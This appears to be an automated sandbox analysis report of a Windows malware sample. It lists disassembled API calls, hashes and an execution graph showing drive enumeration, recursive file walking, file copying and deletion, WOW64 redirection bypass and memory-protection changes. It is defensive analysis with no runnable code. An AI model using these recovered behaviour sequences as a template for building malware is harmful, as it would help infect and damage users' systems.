                                                            • Opcode ID: 760b8ec1b98feddbb56102039cc65471c162237dc6e67d579ed0e446b2dcdd2b
                                                            • Instruction ID: 11901c3f6b14eb1749ec7d26dfa3ad7f0dcff4b6c4f3048be260d7462171e6d6
                                                            • Opcode Fuzzy Hash: 760b8ec1b98feddbb56102039cc65471c162237dc6e67d579ed0e446b2dcdd2b
                                                            • Instruction Fuzzy Hash: F321F0B4D80308FBEF209F90CC06BDDBBB1EB08751F204054F6047A290C3BA26549F68
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 10002185
                                                            • GetProcAddress.KERNEL32(1000298A,Wow64DisableWow64FsRedirection), ref: 100021B9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                            • API String ID: 1646373207-3689287502
                                                            • Opcode ID: 2d6a8cc7341aec2b21cc3a45615ad9ea7dee55bfb4bfb37d5e34aa06d5c356f1
                                                            • Instruction ID: d2d00d676c4ad851fc6b23513c097a13a4f6d33bf9b718d23b52b013969d18d5
                                                            • Opcode Fuzzy Hash: 2d6a8cc7341aec2b21cc3a45615ad9ea7dee55bfb4bfb37d5e34aa06d5c356f1
                                                            • Instruction Fuzzy Hash: CA21C0B4D40318FBFF209F90DC06BEDBAB1EB09750F204154FA043A294C3BA2A549F59
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,?,?,?,?,?,?,?,?,?,?,?,?,10002A1D,00000000), ref: 100022FF
                                                            • GetProcAddress.KERNEL32(10002A1D,RegDisableReflectionKey), ref: 10002333
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: RegDisableReflectionKey$advapi32.dll
                                                            • API String ID: 1646373207-3904739039
                                                            • Opcode ID: 7959173a7b160a80e02dd34c92b5f76e7d7fce0bfc1190afc9d0b3415d28c3cf
                                                            • Instruction ID: 18b73eed5c57cb45183c64e710560f11dee3ba33728fc2edea6a93587305c71d
                                                            • Opcode Fuzzy Hash: 7959173a7b160a80e02dd34c92b5f76e7d7fce0bfc1190afc9d0b3415d28c3cf
                                                            • Instruction Fuzzy Hash: AD21C4B4D40308BBEF219F90DC06BEDBAB1EB09750F208155FA043A2D0C3BA26549F59
                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(advapi32.dll,?,?,?,?,?,?,?,?,?,?,?,?,10002B73,00000000), ref: 100023F1
                                                            • GetProcAddress.KERNEL32(10002B73,RegEnableReflectionKey), ref: 10002425
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressHandleModuleProc
                                                            • String ID: RegEnableReflectionKey$advapi32.dll
                                                            • API String ID: 1646373207-90438499
                                                            • Opcode ID: 54e68ee9129e006b8e9ec13dd580e156273a3408d9c55f288c6bf6c51c537191
                                                            • Instruction ID: 732920e1f038ad8df7d7458ca178afb8ba66b2a2910eef437cd0197142f25c93
                                                            • Opcode Fuzzy Hash: 54e68ee9129e006b8e9ec13dd580e156273a3408d9c55f288c6bf6c51c537191
                                                            • Instruction Fuzzy Hash: BF21C474D81308BBEF219F90DC06BEDBEB1EB09754F208155FA043A2D0D3B626649F69
                                                            APIs
                                                            • RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 10006FD6
                                                            • RtlAllocateHeap.NTDLL(?,00000008,?), ref: 10006FE6
                                                            • MessageBoxA.USER32(00000000,Function_0011D1B4,error,00000010), ref: 10006FFF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AllocateHeap$Message
                                                            • String ID: error
                                                            • API String ID: 3509797044-1574812785
                                                            • Opcode ID: 8376a265707c5d8fa14ff64909ee204434fb25e4642e3f914f6d79a72ea6dbb7
                                                            • Instruction ID: 7598f093ec5018b03bb67e5da8a11141694ece46b5028eb91272e42736f61313
                                                            • Opcode Fuzzy Hash: 8376a265707c5d8fa14ff64909ee204434fb25e4642e3f914f6d79a72ea6dbb7
                                                            • Instruction Fuzzy Hash: 1FF0A7B5A40721BBF614A7709C59F6F3369DB89790F118528F5459B248C778EC408B91
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00402606,00000210,?,00401547,00000001,00000208,00000000,80000301), ref: 00402339
                                                            • RtlAllocateHeap.NTDLL(00770000,00000008,80000301), ref: 0040234D
                                                            • MessageBoxA.USER32(00000000,0051A058,error,00000010), ref: 00402366
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateMessageProcess
                                                            • String ID: error
                                                            • API String ID: 2992861138-1574812785
                                                            • Opcode ID: 351dabebf33b66b1ee040276ef5c02f4a71f0677415e3eadd05a79032461d3f1
                                                            • Instruction ID: 5073c8b473a3ab08406373322ab8028ebd656e55a7eac00c0eab61617b900904
                                                            • Opcode Fuzzy Hash: 351dabebf33b66b1ee040276ef5c02f4a71f0677415e3eadd05a79032461d3f1
                                                            • Instruction Fuzzy Hash: 87E0D8B1A81611BBE6225BF0BD0DF973A94BB68711F00483AFF04F22D0D6B8DC449B56
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(00402645,0000000A,?,?,0040192C,00000002,0000000B,00000000,80000301,00000000,00000000,80000301), ref: 00402389
                                                            • RtlAllocateHeap.NTDLL(00770000,00000000,80000301), ref: 0040239D
                                                            • MessageBoxA.USER32(00000000,0051A058,error,00000010), ref: 004023B6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1697436745.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1697266786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697436745.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697766713.000000000052E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697791529.0000000000531000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1697816514.0000000000532000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateMessageProcess
                                                            • String ID: error
                                                            • API String ID: 2992861138-1574812785
                                                            • Opcode ID: 837a6077ee2695eefff91daaf81a823a3d0f393223a1c7973547f07dc3e220fc
                                                            • Instruction ID: 391a34a311bef266a3b717133f7f5b7c5466a9401dd128ad9b803cf5fb17998c
                                                            • Opcode Fuzzy Hash: 837a6077ee2695eefff91daaf81a823a3d0f393223a1c7973547f07dc3e220fc
                                                            • Instruction Fuzzy Hash: 27E0D8B5A81211BBE6225BF0BD0DF973694AB58711F00483AFF04F22D0D6B8DC449B6A
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(100077A6,00000034,?,10001986,00000001,0000002C,00000000,80000301), ref: 10006F19
                                                            • RtlAllocateHeap.NTDLL(00770000,00000008,80000301), ref: 10006F2D
                                                            • MessageBoxA.USER32(00000000,1011D1B4,error,00000010), ref: 10006F46
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateMessageProcess
                                                            • String ID: error
                                                            • API String ID: 2992861138-1574812785
                                                            • Opcode ID: e417605d01bb5fce954bbfe32a696ab0afe2bdac1ca92b6014c81d0fc0f985ff
                                                            • Instruction ID: 7b679a703bbc30877bf8b749981e8a0a42a61f9b36d3381653e726217cd423f9
                                                            • Opcode Fuzzy Hash: e417605d01bb5fce954bbfe32a696ab0afe2bdac1ca92b6014c81d0fc0f985ff
                                                            • Instruction Fuzzy Hash: D1E092B1A406226BE214BB709C48B5637A9EB097C4B008120F905D6208D778D8448F50
                                                            APIs
                                                            • GetProcessHeap.KERNEL32(10008A78,1000900A,00000000,00000000,00000000,10009009,00000000,00000000), ref: 10006F69
                                                            • RtlAllocateHeap.NTDLL(00770000,00000000,00000000), ref: 10006F7D
                                                            • MessageBoxA.USER32(00000000,1011D1B4,error,00000010), ref: 10006F96
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$AllocateMessageProcess
                                                            • String ID: error
                                                            • API String ID: 2992861138-1574812785
                                                            • Opcode ID: ca5f821c34812dc84bf085f618cae693ec62854cdae7dd9b0a6ca82cf283e6a6
                                                            • Instruction ID: 0f821064dbc35305e907b90f7288090d3c5f56bbac09fc267eafa41461bd0148
                                                            • Opcode Fuzzy Hash: ca5f821c34812dc84bf085f618cae693ec62854cdae7dd9b0a6ca82cf283e6a6
                                                            • Instruction Fuzzy Hash: 79E0DFB1B403327BF614BB70AC48B9B37A9EB097C4F008130F805D6208E738E8808F91
                                                            APIs
                                                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 10004D56
                                                            • EnumProcesses.PSAPI(00000000,00000000,00000000), ref: 10004D8C
                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,00000000,-00000004,00000000,?,00000000), ref: 10004E12
                                                            • LocalFree.KERNEL32(00000000), ref: 10004E53
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Local$Free$AllocEnumProcesses
                                                            • String ID:
                                                            • API String ID: 1437658136-0
                                                            • Opcode ID: dcd95d97f63bca6ded3ab6a2d473a76b0a48fda5c866d551e8004f8841cfd76f
                                                            • Instruction ID: 1994955de824f452309e29f328317f553d4fcca8952cc6dcc2faa55fb100117e
                                                            • Opcode Fuzzy Hash: dcd95d97f63bca6ded3ab6a2d473a76b0a48fda5c866d551e8004f8841cfd76f
                                                            • Instruction Fuzzy Hash: B9415BB1D0420CEBEF00DFA0DD4ABEEBBB0FB09341F118165E1057A284DB765A64CB99
                                                            APIs
                                                            • malloc.MSVCRT ref: 10008FB0
                                                            • LCMapStringA.KERNEL32(00000804,00400000,?,?,00000000,00000001), ref: 10008FE4
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10008FF3
                                                            • ??3@YAXPAX@Z.MSVCRT ref: 1000900C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ??3@$Stringmalloc
                                                            • String ID:
                                                            • API String ID: 1006641717-0
                                                            • Opcode ID: 088a9fd3b85dad178b7232b45b9c1706a0669424f7d03574f2e79cab0a521588
                                                            • Instruction ID: a10b90c845da0e78ccd7c29f75597eb04ad1cc2081a666b1e845aefd9c8f095a
                                                            • Opcode Fuzzy Hash: 088a9fd3b85dad178b7232b45b9c1706a0669424f7d03574f2e79cab0a521588
                                                            • Instruction Fuzzy Hash: F211E4763046146FE304EB749C81EAB73DDEB84685F408538F54693A05EA34FE0987A6
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,00000000), ref: 10005A6F
                                                            • OpenProcess.KERNEL32(00000001,00000000,00000000,00000000,00000000), ref: 10005AAD
                                                            • TerminateProcess.KERNEL32(00000000,00000000), ref: 10005AF5
                                                            • CloseHandle.KERNEL32(00000000), ref: 10005B24
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Process$CloseCurrentHandleOpenTerminate
                                                            • String ID:
                                                            • API String ID: 983841585-0
                                                            • Opcode ID: b982b2a8e98628ce0359413f5a1d46586f83e47a55eae3b53ae039aee33b852f
                                                            • Instruction ID: 5af734b1b4482cf2c595206e49c1021d7ffc53c820689ffedd50f1d41fd0b5e2
                                                            • Opcode Fuzzy Hash: b982b2a8e98628ce0359413f5a1d46586f83e47a55eae3b53ae039aee33b852f
                                                            • Instruction Fuzzy Hash: 8D212F70E44308FBFB00DFA0DC4AB5DBBB0EB0A792F108465F5057A184D67A6650DF96
                                                            APIs
                                                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000020,00000000,?,00000001,00000000,00000000,00000000), ref: 10007D58
                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,0000026C,?,00000001,00000000,00000000,00000000), ref: 10007D97
                                                            • CloseHandle.KERNEL32(00000000,?,?,0000026C,?,00000001,00000000,00000000,00000000), ref: 10007DAA
                                                            • CloseHandle.KERNEL32(00000000,?,?,0000026C,?,00000001,00000000,00000000,00000000), ref: 10007DC5
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1698184330.0000000010001000.00000040.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.1698158770.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010106000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.0000000010113000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698184330.000000001012C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698434567.000000001012D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000000.00000002.1698452082.000000001012F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_LisectAVT_2403002B_48.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseFileHandle$CreateWrite
                                                            • String ID:
                                                            • API String ID: 3602564925-0
                                                            • Opcode ID: edc703d2f44d38fd198139299cf68810a84000a616ab3fbd3520ce3e141b5dc5
                                                            • Instruction ID: 055c9e56074d8cc09c6074bc469af8ae9e79eeff385e5dde8faca941d3853d3a
                                                            • Opcode Fuzzy Hash: edc703d2f44d38fd198139299cf68810a84000a616ab3fbd3520ce3e141b5dc5
                                                            • Instruction Fuzzy Hash: EF11CE32600306ABE710CF18DCC5F6AB3F4FB85794F154A1AFA9897280D374E8098762

                                                            Execution Graph

                                                            Execution Coverage:32.2%
                                                            Dynamic/Decrypted Code Coverage:10.4%
                                                            Signature Coverage:19.2%
                                                            Total number of Nodes:297
                                                            Total number of Limit Nodes:12
                                                            execution_graph 1005 b6158 VirtualFree 1009 b60c7 1005->1009 1006 b6198 VirtualFree 1010 b61b2 1006->1010 1007 b60d5 VirtualAlloc 1007->1009 1008 b6389 VirtualProtect 1014 b63b7 1008->1014 1009->1006 1009->1007 1013 b615f VirtualFree 1009->1013 1010->1008 1016 b62fb 1010->1016 1011 b63fc VirtualProtect 1012 b6400 1011->1012 1013->1009 1014->1011 1015 b63e7 VirtualProtect 1014->1015 1015->1011 1015->1014 1017 b14e1 1018 b14fd GetModuleHandleA 1017->1018 1019 b1541 1017->1019 1020 b151a VirtualQuery 1018->1020 1021 b1512 1018->1021 1022 b1549 1019->1022 1023 b1573 1019->1023 1020->1021 1021->1019 1027 b1566 1022->1027 1045 b1af9 1022->1045 1028 b1638 GetTempPathA GetSystemDirectoryA GetModuleFileNameA 1023->1028 1025 b1579 ExitProcess 1029 b167a 1028->1029 1030 b167f 1028->1030 1063 b139f GetVersionExA 1029->1063 1051 b1718 GetSystemTimeAsFileTime 1030->1051 1033 b1686 1034 b16ca 1033->1034 1040 b16a0 CreateThread 1033->1040 1035 b16d0 1034->1035 1036 b16d7 1034->1036 1084 b1581 1035->1084 1038 b170f 1036->1038 1039 b16dd lstrcpy 1036->1039 1038->1025 1039->1025 1056 b2c48 memset 1040->1056 1300 b1099 1040->1300 1044 b1718 3 API calls 1044->1034 1046 b1b09 1045->1046 1047 b1b11 1045->1047 1048 b1638 188 API calls 1046->1048 1049 b1b16 CreateThread 1047->1049 1050 b1b0f 1047->1050 1048->1050 1049->1050 1319 b1638 189 API calls 1049->1319 1050->1027 1052 b1735 SHSetValueA 1051->1052 1053 b1754 1051->1053 1055 b1786 __aulldiv 1052->1055 1054 b175a SHGetValueA 1053->1054 1053->1055 1054->1055 1055->1033 1090 b1973 PathFileExistsA 1056->1090 1058 b2cb2 1061 b2cbb VirtualFree 1058->1061 1062 b16ba WaitForSingleObject 1058->1062 1059 b2c8f CreateThread WaitForMultipleObjects 1059->1058 1112 b2b8c memset GetLogicalDriveStringsA 1059->1112 1061->1062 1062->1044 1064 b14da 1063->1064 1065 b13cf LookupPrivilegeValueA 1063->1065 1064->1030 1066 b13ef 1065->1066 1067 b13e7 1065->1067 1066->1064 1285 b120e GetModuleHandleA GetProcAddress 1066->1285 1280 b119f GetCurrentProcess OpenProcessToken 1067->1280 1073 b1448 GetCurrentProcessId 1073->1064 1074 b1457 1073->1074 1074->1064 1075 b1319 3 API calls 1074->1075 1076 b147f 1075->1076 1077 b1319 3 API calls 1076->1077 1078 b148e 1077->1078 1078->1064 1079 b1319 3 API calls 1078->1079 1080 b14b4 1079->1080 1081 b1319 3 API calls 1080->1081 1082 b14c3 1081->1082 1083 b1319 3 API calls 1082->1083 1083->1064 1299 b185b GetSystemTimeAsFileTime srand rand srand rand 1084->1299 1086 b1592 wsprintfA wsprintfA lstrlen CreateFileA 1087 b15fb WriteFile CloseHandle 1086->1087 1088 b1633 1086->1088 1087->1088 1089 b161d ShellExecuteA 1087->1089 1088->1038 1089->1088 1091 b19a0 1090->1091 1093 b1ac7 1090->1093 1092 b19af CreateFileA 1091->1092 1094 b1a28 GetFileSize 1092->1094 1095 b19c4 Sleep 1092->1095 1093->1058 1093->1059 1097 b1a38 1094->1097 1109 b1a80 1094->1109 1095->1092 1096 b19d5 1095->1096 1111 b185b GetSystemTimeAsFileTime srand rand srand rand 1096->1111 1101 b1a3d VirtualAlloc 1097->1101 1097->1109 1098 b1a8d FindCloseChangeNotification 1099 b1a96 1098->1099 1102 b1aad 1099->1102 1103 b1a9c DeleteFileA 1099->1103 1105 b1a53 1101->1105 1101->1109 1102->1093 1110 b1ab8 VirtualFree 1102->1110 1103->1102 1104 b19da wsprintfA CopyFileA 1104->1094 1107 b1a0d CreateFileA 1104->1107 1108 b1a59 ReadFile 1105->1108 1105->1109 1107->1094 1107->1103 1108->1105 1108->1109 1109->1098 1109->1099 1110->1093 1111->1104 1113 b2c09 WaitForMultipleObjects 1112->1113 1114 b2bc8 1112->1114 1116 b2c2a CreateThread 1113->1116 1117 b2c3c 1113->1117 1115 b2bfa lstrlen 1114->1115 1118 b2bd2 GetDriveTypeA 1114->1118 1119 b2be3 CreateThread 1114->1119 1115->1113 1115->1114 1116->1117 1123 b2845 1116->1123 1118->1114 1118->1115 1119->1115 1120 b2b7d 1119->1120 1133 b29e2 memset wsprintfA 1120->1133 1270 b274a memset memset SHGetSpecialFolderPathA wsprintfA 1123->1270 1125 b2878 DeleteFileA 1126 b289a 1125->1126 1127 b288c VirtualFree 1125->1127 1129 b28ab 1126->1129 1130 b28a4 CloseHandle 1126->1130 1127->1126 1128 b2692 8 API calls 1131 b2853 1128->1131 1130->1129 1131->1125 1131->1128 1132 b239d 186 API calls 1131->1132 1132->1131 1134 b2a3a memset lstrlen lstrcpyn strrchr 1133->1134 1135 b2abc memset memset FindFirstFileA 1133->1135 1134->1135 1136 b2a88 1134->1136 1147 b28b8 memset wsprintfA 1135->1147 1136->1135 1138 b2a9a lstrcmpiA 1136->1138 1140 b2aad lstrlen 1138->1140 1141 b2b74 1138->1141 1140->1135 1140->1138 1142 b2b61 FindNextFileA 1143 b2b6d FindClose 1142->1143 1144 b2b23 1142->1144 1143->1141 1145 b2b35 lstrcmpiA 1144->1145 1146 b28b8 174 API calls 1144->1146 1145->1143 1145->1144 1146->1142 1148 b2905 1147->1148 1153 b2951 memset 1147->1153 1149 b291b memset wsprintfA 1148->1149 1150 b2956 strrchr 1148->1150 1148->1153 1151 b29e2 180 API calls 1149->1151 1152 b2967 lstrcmpiA 1150->1152 1150->1153 1151->1153 1154 b297a 1152->1154 1155 b2988 lstrcmpiA 1152->1155 1153->1142 1165 b1e6e 1154->1165 1155->1153 1157 b2994 1155->1157 1158 b29ad strstr 1157->1158 1161 b29a5 lstrcpy 1157->1161 1159 b29cb 1158->1159 1160 b29d3 1158->1160 1208 b239d strstr 1159->1208 1230 b2692 1160->1230 1161->1158 1166 b1e7d 1165->1166 1239 b1df6 strrchr 1166->1239 1169 b2332 1172 b233d UnmapViewOfFile 1169->1172 1173 b2346 1169->1173 1170 b1eb0 SetFileAttributesA CreateFileA 1170->1169 1171 b1edf 1170->1171 1244 b1915 1171->1244 1172->1173 1176 b234b FindCloseChangeNotification 1173->1176 1177 b2350 1173->1177 1176->1177 1178 b2391 1177->1178 1179 b2356 CloseHandle 1177->1179 1178->1153 1179->1178 1180 b1f2e 1180->1169 1250 b1c81 1180->1250 1184 b1f92 